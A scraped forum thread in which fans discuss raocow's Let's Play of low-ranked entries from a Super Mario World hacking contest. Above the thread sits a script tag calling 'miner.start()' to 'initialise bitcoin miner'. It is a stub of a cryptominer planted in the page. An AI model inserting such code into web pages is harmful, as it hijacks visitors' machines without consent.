<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxysmbx community

New SMWC contest thingy: the 9th Door: the series.

this is the place where lps are being talked about. it's important to talk about games being played on the internet.
User avatar
Fapnoob
Posts: 61
Joined: 10 years ago

New SMWC contest thingy: the 9th Door: the series.

Postby Fapnoob » 7 years ago

New day, new A side.
Promising start so far. With all due respect to the creators, its fun to see all the bad levels :D

User avatar
raocow
the death of the incredible huge
Posts: 2808
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: New SMWC contest thingy: the series.

Postby raocow » 7 years ago

You could at least have given it a proper name!!!
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Rameau's Nephew
Posts: 0
Joined: 9 years ago

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Rameau's Nephew » 7 years ago

Speaking of proper names, I fear you made an error in today's video, raocow. The designer's name is Lespna1, yet you refer to him at one point as Poopface1. Those aren't even similar at all.

User avatar
raocow
the death of the incredible huge
Posts: 2808
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: New SMWC contest thingy: the 9th Door: the series.

Postby raocow » 7 years ago

It's a pretty rare dialect.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
morsel/morceau
Posts: 373
Joined: 9 years ago
Location: exotic horse island

Re: New SMWC contest thingy: the 9th Door: the series.

Postby morsel/morceau » 7 years ago

A ninth door, you say? Anyone got a headcount on Beloved Tomboyish Daughters?
dont wanna jihad no more

User avatar
Ashan
The world has become a place
Posts: 2058
Joined: 9 years ago
Location: Canada

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Ashan » 7 years ago

Ever since you got partnered with Machinima, it seems like you've been trying to make people forget that you're playing on an emulator. Is that just me, or have you been making an honest effort to do that for the sake of legitimacy?

morsel/morceau wrote:A ninth door, you say? Anyone got a headcount on Beloved Tomboyish Daughters?
I was thinking the same thing. As soon as he explained the contest, I was hoping for an edited door select room that went 1, 2, ⑨.
Image
Image
Image
Image
Image
Image

User avatar
Test Pilot Monkey
Posts: 0
Joined: 9 years ago
Location: here

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Test Pilot Monkey » 7 years ago

The lowest ranking 'level' is not a troll but one that misunderstood the concept? This is unfamiliar territory here.

User avatar
raocow
the death of the incredible huge
Posts: 2808
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: New SMWC contest thingy: the 9th Door: the series.

Postby raocow » 7 years ago

One of the first official message that I got was to avoid showing the emulator because it would reveal my name, etc, but after reading that I figured I'd go all out, just of the heck of it.
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
Giygas60659
Posts: 0
Joined: 8 years ago
Location: Denham Springs

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Giygas60659 » 7 years ago

raocow wrote:One of the first official message that I got was to avoid showing the emulator because it would reveal my name, etc, but after reading that I figured I'd go all out, just of the heck of it.
Well that's weird. We've seen your name plenty of times, and your last name is on your web comics anyway so I guess it doesn't matter.
Image
Image

User avatar
Sebby19
Posts: 2535
Joined: 10 years ago
Location: Winnipeg, Manitoba

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Sebby19 » 7 years ago

raocow wrote:One of the first official message that I got was to avoid showing the emulator because it would reveal my name, etc, but after reading that I figured I'd go all out, just of the heck of it.
Reveal your name? I've never noticed....
ImageImage
-Banned in Antarctica
Sebby19 wrote:If your life depends on throwing up, switch to the keyboard
Official raocow subscriber # 30,000

User avatar
Test Pilot Monkey
Posts: 0
Joined: 9 years ago
Location: here

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Test Pilot Monkey » 7 years ago

Sebby19 wrote: Reveal your name? I've never noticed....
I remember it showing up once and raocow saying something like, "Oh man, my real name!" so I guess you didn't see that video.

S.N.N.
Posts: 497
Joined: 10 years ago
Location: Ontario, Canada

Re: New SMWC contest thingy: the 9th Door: the series.

Postby S.N.N. » 7 years ago

Little fact about this last place level and why it is so low:
S.N.N. wrote:Fun fact: this was the exact same sublevel that the author submitted as an attempt to fit into SMWCP, hence why he spams the world 3 boss throughout it.

To those who thought genuine effort went into this, allow me to confirm that none went in at all. He didn't even bother specifically designing a new level for this contest.
A further note is that this hacker has been on the hacking scene for longer than I have (that is, over seven years now) and his skills have not improved at all. It's almost .. incredibly sad from my point of view. Like, I genuinely feel bad for him.

Slit08
Posts: 193
Joined: 9 years ago
Location: Augsburg, Germany

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Slit08 » 7 years ago

I honestly have to say that I am slightly disappointed that you decided to play the contest levels cause I thought that we would get to see one of the hacks like Hyper VI or Mario Gives Up 2!
[ img ]http://www.loadthegame.com/wp-content/u ... 4jun14.jpg[/ img ]

Night comes and with it terrible horrors.

The hunt begins!

User avatar
MrDeePay
Posts: 0
Joined: 9 years ago
Location: Texas

Re: New SMWC contest thingy: the 9th Door: the series.

Postby MrDeePay » 7 years ago

If you insist on this series without dragging it out, I would go with what some people say at the end of Vanilla '10; that being doing the bottom 10 and Top 20.

With that said, don't touch my entry at all. I asked to have it unranked because of a misinterpretation of the rules.
The lowest ranking 'level' is not a troll but one that misunderstood the concept? This is unfamiliar territory here.
Several low-mid ranking entries scored what they did because of what they misinterpreted the rules.

User avatar
Yonowaaru
Posts: 0
Joined: 10 years ago
Location: Somewhere in the Nethereal Lands?

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Yonowaaru » 7 years ago

raocow wrote:One of the first official message that I got was to avoid showing the emulator because it would reveal my name, etc, but after reading that I figured I'd go all out, just of the heck of it.
It's no problem, we all knew your real name was Hououin Kyouma.
GENERATION 25: The first time you see this, copy it into your sig on any forum and add 1 to the generation. Social experiment.

User avatar
Mineyl
Posts: 91
Joined: 8 years ago

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Mineyl » 7 years ago

For those curious about raocow's suspicion, I can confirm that this is one of the beta versions of the SMWCP base ROM from before the coin counter was changed to five digits and the score was done away with.

Kinda' sad to see it, really...but as SNN said, there was no effort put into this at all.
raocow wrote:I'm feeling so smug I'm gonna' stare at myself in the mirror for 23 hours!

User avatar
Argumentable
the biggest shit
Posts: 533
Joined: 10 years ago
Location: Under the bed
Contact:

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Argumentable » 7 years ago

How exactly do you misinterpret the idea? It's like... pretty simple

User avatar
raocow
the death of the incredible huge
Posts: 2808
Joined: 10 years ago
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Re: New SMWC contest thingy: the 9th Door: the series.

Postby raocow » 7 years ago

MrDeePay wrote:If you insist on this series without dragging it out, I would go with what some people say at the end of Vanilla '10; that being doing the bottom 10 and Top 20.

With that said, don't touch my entry at all. I asked to have it unranked because of a misinterpretation of the rules.
The lowest ranking 'level' is not a troll but one that misunderstood the concept? This is unfamiliar territory here.
Several low-mid ranking entries scored what they did because of what they misinterpreted the rules.
I was thinking all three unranked (two disqualified and yours) at the end or something, would you mind if I played it in that context?
the chillaxest of dragonsImage
Image
Image
Image
ImageImage

User avatar
ano0maly
Discord User
Posts: 1729
Joined: 8 years ago

Re: New SMWC contest thingy: the 9th Door: the series.

Postby ano0maly » 7 years ago

I just want to say that these contests have become to me among the least favorite of raocow's LPs. Seeing all these low-ranking levels and wondering why they're even here and then making fun of them isn't enjoyable for me, especially how long the last contest video series dragged on. raocow himself said during the later part of it that it was losing its taste.

But I'll check in occasionally to see if there's something particular interesting going on.
Image The talkhaus Discord server. Come ask for an invite to join!

Image
Image
Image
Image << Click!

User avatar
limepie20
Posts: 0
Joined: 9 years ago
Location: Doesn't Matter

Re: New SMWC contest thingy: the 9th Door: the series.

Postby limepie20 » 7 years ago

The vanilla bowser brought back some bad memories.

also, no comment on the level. Just kidding; it was really bad.

User avatar
AUS
Posts: 117
Joined: 9 years ago
Location: アース

Re: New SMWC contest thingy: the 9th Door: the series.

Postby AUS » 7 years ago

Ah man! If I had known that raocow was going to do this contest (and if I had known this contest existed) I would have made a terrible level with horrible palettes and threw in tons of blatant references and an automated level!

Actually, that wasn't very funny the first time, so I probably wouldn't have. Oh well, here's to a start of a new thing.
Image
"oh no my best friend was replaced by a evil demon shadow monster"
"argh i am the evil shadow monster demon shadow"
Vip is pronounced "Beep"
I go by ToNi now. Trying to homogenize my internet handle.

User avatar
alex2
Banned
Posts: 0
Joined: 7 years ago

Re: New SMWC contest thingy: the 9th Door: the series.

Postby alex2 » 7 years ago

The one I'm really looking forward to is leod's level, for reasons that will be obvious when we get there.
Warning: Opinions expressed by alex2 or others in this post do not necessarily reflect the views, opinions, or position of alex2 himself on the matter(s) being discussed therein.
raocow wrote:a3xt will be my last project, after which I will quit lp forever
SPASM - LevelASM for Yoshi's Island!
My mosts things:
Image
Image
Image
Image

User avatar
Ashan
The world has become a place
Posts: 2058
Joined: 9 years ago
Location: Canada

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Ashan » 7 years ago

raocow wrote:One of the first official message that I got was to avoid showing the emulator because it would reveal my name, etc, but after reading that I figured I'd go all out, just of the heck of it.
Uh... We've seen your name multiple times, Samuel.
Heck, the back of the comics even say your city.
Image
Image
Image
Image
Image
Image

User avatar
McGack
Posts: 0
Joined: 9 years ago
Location: Bizarro Earth

Re: New SMWC contest thingy: the 9th Door: the series.

Postby McGack » 7 years ago

id almost prefer a troll level if it werent for the whole making your eyes bleed thing that comes with them

User avatar
Oracle of Wuffing
Posts: 0
Joined: 10 years ago

Re: New SMWC contest thingy: the 9th Door: the series.

Postby Oracle of Wuffing » 7 years ago

Relevant reading, I guess, Official Event Topic what with all the rules, Topic where people submitted entries, and Critique Notes for the entries arranged by submitter's name alphabetically.
S.N.N. wrote:To those who thought genuine effort went into this, allow me to confirm that none went in at all. He didn't even bother specifically designing a new level for this contest.
raocow wrote:I was thinking all three unranked (two disqualified
Okay, I'm curious- do I want to know what was necessary to achieve disqualification now, or should I wait until the disqualified entries come up to actually hear about that? 'Cause I mean, when the rule is that one is to make a hack within 24 hours, and then you don't actually make a hack in those 24 hours, it sounds to me like this hack should have been disqualified. I assume the two are either god awful or just ended up submitting after the deadline passed.

Also

like

Anyone want to say anything about how they ranked the entries that were tied this time around?
raocow wrote:Next LP project - the entire hunter/scorpion series in chronological order


Return to “let's play”

Who is online

Users browsing this forum: DinnerSonic, Google [Bot] and 12 guests